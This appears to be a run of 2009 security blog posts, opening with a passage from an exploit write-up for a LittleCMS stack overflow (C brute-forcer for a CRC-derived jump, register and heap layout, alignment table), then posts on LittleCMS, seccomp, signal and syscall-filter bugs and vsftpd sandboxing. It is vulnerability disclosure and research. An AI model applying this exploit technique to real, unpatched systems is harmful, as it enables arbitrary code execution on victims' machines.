  • There are two types of constructs in the input ICC profile used as a basis to populate this structure: curv and para. curv is of little use to us because it mostly leaves Crc32 set to 0 (or set based only on 16 bits of input entropy). Trying to execute the code 0x00 0x00 is a crash because it dereferences the %eax register: add %al,(%eax), and the value of this register is left as 0 or 1 to denote success or failure when the ReadSetOfCurves function exits.

  • This leaves us looking at a para curve, which calculates Crc32 based very indirectly on some input variables under our control. Although we can't reverse it, we can brute force it with a little program:

    #include "lcms.h"

    void AdjustEndianess32(LPBYTE pByte)
    {
        BYTE temp1;
        BYTE temp2;

        temp1 = *pByte++;
        temp2 = *pByte++;
        *(pByte-1) = *pByte;
        *pByte++ = temp2;
        *(pByte-3) = *pByte;
        *pByte = temp1;
    }

    double Convert15Fixed16(icS15Fixed16Number fix32)
    {
        double floater, sign, mid, hack;
        int Whole, FracPart;

        AdjustEndianess32((LPBYTE) &fix32);

        sign = (fix32 < 0 ? -1 : 1);
        fix32 = abs(fix32);

        Whole = LOWORD(fix32 >> 16);
        FracPart = LOWORD(fix32 & 0x0000ffffL);

        hack = 65536.0;
        mid = (double) FracPart / hack;
        floater = (double) Whole + mid;

        return sign * floater;
    }

    int main(int argc, const char* argv[])
    {
        unsigned int crc;
        unsigned char* p_crc;
        double params[10];
        int type = 0;
        unsigned int i;
        unsigned int start = atoi(argv[1]);

        for (i = start; i <= 0xffffffff; ++i) {
            if ((i % 10000) == 0) {
                printf("progress: %u\n", i);
            }
            params[0] = Convert15Fixed16(i);
            LPGAMMATABLE table = cmsBuildParametricGamma(4096, type + 1, params);
            crc = table->Seed.Crc32;
            p_crc = (unsigned char*) &crc;
            if ((p_crc[0] == 0x93 || p_crc[0] == 0x95 || p_crc[0] == 0x97) &&
                p_crc[1] == 0xff &&
                p_crc[2] == 0xe6) {
                printf("got it!!!!!!! %u %u\n", i, p_crc[0]);
                return 0;
            }
        }
        return 1;
    }

  • What does this program do? Let's see:

    chris@chris-desktop:~/progs$ ./a.out 3221970952
    got it!!!!!!! 3221970952 151

    This is telling us that a para curve of type 0 whose 4 input bytes are 3221970952 == 0xC00B6008 will result in 0x97 0xff 0xe6 0x?? being written to Crc32. We don't care about the last byte. This assembles to xchg %eax,%edi jmp %esi which will execute because %eip jumps to this para heap chunk, which starts with the CRC. It is urgent to do something in 4 bytes or less because we have terrible control over the rest of the content of this heap chunk. What these 3 bytes do is to overwrite %eax with %edi then jump to %esi. The significance here is that both registers we used were under our control because they were also restored from the stack we trashed with pointers to valid heap chunks.

  • So execution continues at the curve heap chunk pointed to by %esi. We arrange for this to be a curv type chunk. Earlier we dismissed them as useless because the 0 Crc32 will result in a dereference of %eax. But now, thanks to our para chunk, we've repaired %eax to point to a valid heap chunk! Unlike para chunks, curv chunks do contain arbitrary data we can supply, after a mostly-zero header. We've essentially used the control at the beginning of a para chunk to repair %eax and use the vast control at the end of a curv chunk. Before our arbitrary code executes, a bunch of now harmless 0x00 0x00 will execute, writing some junk at the start of one of our unused heap chunks. Finally, just before our arbitrary code, the value of nEntries in the header will be executed. This value is 0x02 0x00 0x00 0x00 which is add (%eax),%al add %al,(%eax). This trashes %eax a little bit before dereferencing it again, but only up to 256 bytes, so we're good and we could always use a different number of entries in our curv chunk. Certainly, a real payload would need more than 2 words.

  • The actual arbitrary code that executes is 0xeb 0xfe which is equivalent to for (;;); in C. Look out for an endian reversed instance of those two bytes, as well as an endian reversed 0xC00B6008 in the exploit file.

  • There's one further twist in the exploit relating to stack alignment. Some compilation optimization leaves no space between the end of the Curves array and the start of the saved registers. Other cases have a 4-byte gap. The exploit caters for both these stack layouts by careful layout of curv vs. para chunks. Here's a simple illustrative table:

    Curve in input file          Hit if 0 gap    Hit if 4 bytes gap
    17: blank curve              ebp             (4-byte gap)
    18: curv payload             esi             ebp
    19: curv payload             edi             esi
    20: blank curve              ebx             edi
    21: para redirect payload    eip             ebx
    22: para redirect payload    eip + 4         eip

    As can be seen, %eip always gets the para payload and %esi always gets the real payload.
With thanks to Julien Tinnes and Tavis Ormandy for inspiration.

Tuesday, March 17, 2009

LittleCMS vulnerabilities

Today, vendor updates should be flowing for vulnerabilities in LittleCMS, sometimes known just as "lcms" or "liblcms". LittleCMS is a very useful open-source colour profile parsing and conversion tool. Some technical details of the various vulnerabilities (stack-based buffer overflows, integer overflows, etc.) are given here:

The most interesting thing about LittleCMS is how quickly it has become a very critical building block for UNIX desktops. Let's enumerate some of the pieces of software impacted by any lcms vulnerabilities:
  • OpenJDK. OpenJDK uses lcms to parse colour profiles embedded in JPEG or BMP files. OpenJDK is on the default browser attack surface of a lot of Linux installations, e.g. Fedora 10.

  • Firefox. Firefox 3.1beta uses lcms to parse colour profiles embedded in JPEG files -- by default. (Firefox 3.0 has this ability but not by default, so thankfully this can be addressed before 3.1 goes production).

  • GIMP. GIMP uses the system liblcms library to parse colour profiles embedded in at least JPEG files.
I don't usually do this, but I took the trouble to write an exploit for one of the bugs, because it was fun and had some quirks. It's probably not a great idea to release it just yet -- look for a separate blog post soon.

Finally, some notes on the various Linux system protections that do or don't help defend against the exploit for this stack-based buffer overflow:
  • My exploit targets, but is not limited to, systems with executable heaps. Interestingly 32-bit Ubuntu 8.10 on my laptop shows the heap as non-executable in /proc/<pid>/maps, but it lies because the installed kernel is non-PAE.

  • For systems with non-executable heaps, such as 64-bit Ubuntu 8.10 on my desktop, an exploit is still possible because you can point registers other than rip into the heap (e.g. rbp). I've not written this exploit.

  • Systems with stack smashing detection, such as Fedora 10, do make the exploit hard or impossible. However, the somewhat risky OpenJDK package on such a system is not compiled with stack smashing detection, leaving the default browsing experience vulnerable.

  • I noticed that the Fedora 10 stack smashing detection does not exit cleanly, but gives a SIGSEGV. On 32-bit, the faulting instruction is cmpw $0xb858,(%eax) where %eax == 0x1. The stack frames are __stack_chk_fail -> __fortify_fail -> __libc_message -> backtrace -> _Unwind_Backtrace -> ??. Leave a comment if you know what's going on. Sounds dangerous to me.

Wednesday, February 25, 2009

Linux kernel minor "seccomp" vulnerability

I just released some technical details on why and how "seccomp" is vulnerable to the Linux kernel syscall filtering problems that I previously blogged about. The full details may be found here:

The actual bug is of little significance because pretty much no-one uses seccomp:

This searches for the PR_SET_SECCOMP string on Google Code Search

In addition, even if people did use this -- the bug is not a full break out, just some leakage of filesystem names via stat() or mischief via unrestricted chmod().

However, I still find this vulnerability interesting. It's a sobering reminder that even a very simple security technology can have surprising bugs. seccomp applies extremely tight restrictions on untrusted code, but within these constraints, the code still has opportunities to misbehave! And this isn't the only example. For reference, check out how a seccomp-constrained process could historically cause trouble in the syscall tracing path with:

CVE-2007-4573: trouble with the upper 32-bits of %rax not clear

CVE-2008-1615: trouble calling syscalls with a bad value in the %cs register

CVE-2004-0001: trouble with EFLAGS, unknown trigger

Tuesday, February 24, 2009

Linux kernel minor signal vulnerability

I recently came up with a little API abuse of the clone() system call. Not earth shattering, but definitely fun. Essentially, you can send any signal you want at any time to your parent process, even if it is running with real and effective user id of someone else (e.g. root). Full technical details and an example may be found here:

Maybe someone more devious than me can come up with better abuse scenarios. Have at it...

Signals are a tricky area of the kernel on a lot of levels. I find it interesting that every slightly unusual way to send signals in the kernel has suffered from access control issues in the past. For example, this COSEINC advisory notes issues in sending signals via prctl(PR_SET_PDEATHSIG, ...). There were multi-vendor issues with fcntl(..., F_SETOWN, ...) a long time ago which resurfaced in a Linux-specific manner a little later.

Friday, February 20, 2009

vsftpd-2.1.0 and ptrace() sandboxing

The new sandboxing support mentioned in the vsftpd-2.1.0 announcement post is actually a ptrace() based sandbox.

It is experimental and therefore off by default. It only currently supports i386 Linux (but there's no reason you couldn't hack the Makefile to build 32-bit on 64-bit Linux). When enabled, it only engages when using one_process_model, i.e. simple anonymous-only configurations. To (try and) enable it, set sandbox=YES in your config file. If you do try, please e-mail or leave a comment, even if it works!

But was it worth the effort? That's a very astute question; vsftpd already pioneered privsep support as a way of limiting the damage of a compromise of the FTP parsing code (or more likely OpenSSL, if enabled).

Let's briefly examine the damage that can be done in the event of a compromise of the low-privileged end of a privsep-based solution. Let's also assume the low-privileged end is running in a suitable chroot() jail with no sensitive, writeable or setuid files. With arbitrary code execution, the attacker can still:
  • Mount attacks against the kernel API to gain root
  • Connect to internal RFC1918 networks, i.e. firewall bypass
  • Connect to localhost, i.e. attack local-only services
  • Cause a nuisance by spraying SIGKILL signals around
  • Mess with any shared objects (e.g. POSIX shared memory) with inappropriate permissions
  • Subvert other processes with the same UID / GID via ptrace() (vsftpd defends against this as long as you set nopriv_user to a value unique to vsftpd)
  • Abuse your CPU / bandwidth

The sandbox eliminates most of the above concerns and drastically reduces the attack surface on others. On the downside, there are some minor performance losses such as an extra process per-session and per-syscall overhead but nothing severe. So for extreme paranoia, perhaps there is benefit here. We'll see.

Wednesday, February 18, 2009

vsftpd-2.1.0 released

I just released vsftpd-2.1.0, with full details being available on the vsftpd web page:

It fixes a bunch of bugs and compile errors, introduces a few minor new features, has some code clean ups, etc. etc.

vsftpd-2.1.0 is interesting from a security perspective because of its changes to SSL support. It actually contains a reasonable resolution to the connection theft attack I blogged about here:

In the linked advisory I said "I have a crazy idea to use the SSL session cache as a cheezy form of authentication". Well, thanks to investigation by Tim Kosse of FileZilla fame, it turns out this is a very feasible option. Better still, a large number of clients already (whether they know it or not) use SSL session reuse between the control and data connection. This includes up to date versions of FileZilla, lftp and command line ftp-ssl. Therefore, vsftpd now defaults to requiring SSL session reuse. If your SSL FTP client does not re-use sessions, you can turn this off but you would do better to change FTP clients. Tim's FileZilla seems like a pretty awesome option to me. Hopefully other FTP servers will follow suit (quick source code scanning of popular open source ones seemed to lack a call to the relevant SSL_session_reused OpenSSL API).
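In vsftpd.conf terms, the new behaviour corresponds to settings along these lines (option names from memory -- check the release notes if they matter to you):

```
# vsftpd.conf fragment (illustrative)
ssl_enable=YES
# Refuse data connections that do not reuse the control connection's
# SSL session -- the new default described above; set to NO only if
# your client cannot reuse sessions:
require_ssl_reuse=YES
```
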

Other new security features are:
  • A per-process memory map limit of 100MB. Just because it was easy, really. Note however!!! A memory leak in a session-private, isolated child process of a daemon cannot really be considered a security problem in this day and age -- unless you're on crack.

  • An ambitious new built-in sandbox. Think of it as privsep++, but more on this in an upcoming post and paper.

Friday, January 23, 2009

Bypassing syscall filtering technologies on Linux x86_64

For those interested in syscall filtering technologies, check out my latest advisory on how policies can be bypassed under certain circumstances:

There's a neat trick on the x86_64 kernel; this kernel supports both 32-bit and 64-bit processes, and interestingly, the syscall tables are different in either case. However, with a bit of trickery, a 64-bit process can call a 32-bit syscall (and vice versa), and confuse the syscall filter.

This was discovered whilst experimenting on a new security feature for vsftpd; a future post will go into this.